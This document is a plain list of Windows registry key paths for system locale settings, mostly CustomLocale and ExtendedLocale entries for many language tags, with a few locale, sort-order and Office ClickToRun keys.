HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\kn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\kn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\kn-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\kn-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ml
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ml
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ml-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ml-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\as
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\as
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\as-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\as-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mr-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mr-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sa
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sa
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sa-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sa-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mn-MN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mn-MN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bo-CN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bo-CN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\cy
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\cy
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\cy-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\cy-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\km
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\km
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\km-KH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\km-KH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\lo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\lo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\lo-LA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\lo-LA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\gl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\gl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\gl-ES
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\gl-ES
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\kok
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\kok
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\kok-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\kok-IN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\syr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\syr
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\syr-SY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\syr-SY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\si
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\si
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\si-LK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\si-LK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\iu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\iu
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\iu-Latn-CA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\iu-Latn-CA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\am
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\am
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\am-ET
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\am-ET
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tzm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tzm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\tzm-Latn-DZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\tzm-Latn-DZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ne
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ne
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ne-NP
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ne-NP
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fy
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fy
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fy-NL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fy-NL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ps
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ps
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ps-AF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ps-AF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fil
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fil
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fil-PH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fil-PH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dv
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dv
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dv-MV
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dv-MV
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ha
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ha
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ha-Latn-NG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ha-Latn-NG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\yo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\yo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\yo-NG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\yo-NG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\quz
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\quz
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\quz-BO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\quz-BO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\nso
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\nso
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\nso-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\nso-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ba
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ba
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ba-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ba-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\lb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\lb
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\lb-LU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\lb-LU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\kl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\kl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\kl-GL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\kl-GL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ig
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ig
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ig-NG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ig-NG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ii
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ii
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ii-CN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ii-CN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\arn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\arn
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\arn-CL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\arn-CL
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\moh
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\moh
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\moh-CA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\moh-CA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\br
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\br
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\br-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\br-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ug
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ug
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ug-CN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ug-CN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mi-NZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mi-NZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\oc
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\oc
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\oc-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\oc-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\co
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\co
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\co-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\co-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\gsw
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\gsw
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\gsw-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\gsw-FR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sah
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sah
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sah-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sah-RU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\qut
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\qut
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\qut-GT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\qut-GT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\rw
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\rw
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\rw-RW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\rw-RW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\wo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\wo
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\wo-SN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\wo-SN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\prs
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\prs
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\prs-AF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\prs-AF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\gd
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\gd
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\gd-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\gd-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\zh-TW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\zh-TW
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-ES_tradnl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-ES_tradnl
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\iu-Cans-CA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\iu-Cans-CA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\qps-ploc
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\qps-ploc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\00000501
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts\00000501
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\qps-ploca
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\qps-ploca
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\000005FE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts\000005FE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-IQ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-IQ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\de-CH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\de-CH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-MX
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-MX
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-BE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-BE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\it-CH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\it-CH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\nl-BE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\nl-BE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\nn-NO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\nn-NO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\pt-PT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\pt-PT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr-Latn-CS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr-Latn-CS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sv-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sv-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\az-Cyrl-AZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\az-Cyrl-AZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\dsb-DE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\dsb-DE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\se-SE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\se-SE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ms-BN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ms-BN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\uz-Cyrl-UZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\uz-Cyrl-UZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bn-BD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bn-BD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\mn-Mong-CN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\mn-Mong-CN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\quz-EC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\quz-EC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\qps-plocm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\qps-plocm
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\000009FF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts\000009FF
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-EG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-EG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\zh-HK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\zh-HK
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\de-AT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\de-AT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-AU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-AU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-CA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-CA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr-Cyrl-CS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr-Cyrl-CS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\se-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\se-FI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\quz-PE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\quz-PE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-LY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-LY
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\zh-SG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\zh-SG
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\de-LU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\de-LU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-CA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-CA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-GT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-GT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-CH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-CH
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\hr-BA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\hr-BA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\smj-NO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\smj-NO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-DZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-DZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\zh-MO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\zh-MO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\de-LI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\de-LI
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-NZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-NZ
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-CR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-CR
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-LU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-LU
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\bs-Latn-BA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\bs-Latn-BA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\smj-SE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\smj-SE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-MA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-MA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-IE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-IE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-PA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-PA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\fr-MC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\fr-MC
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sr-Latn-BA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sr-Latn-BA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\sma-NO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\sma-NO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\ar-TN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\ar-TN
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\en-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\en-ZA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale\es-DO
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale\es-DO
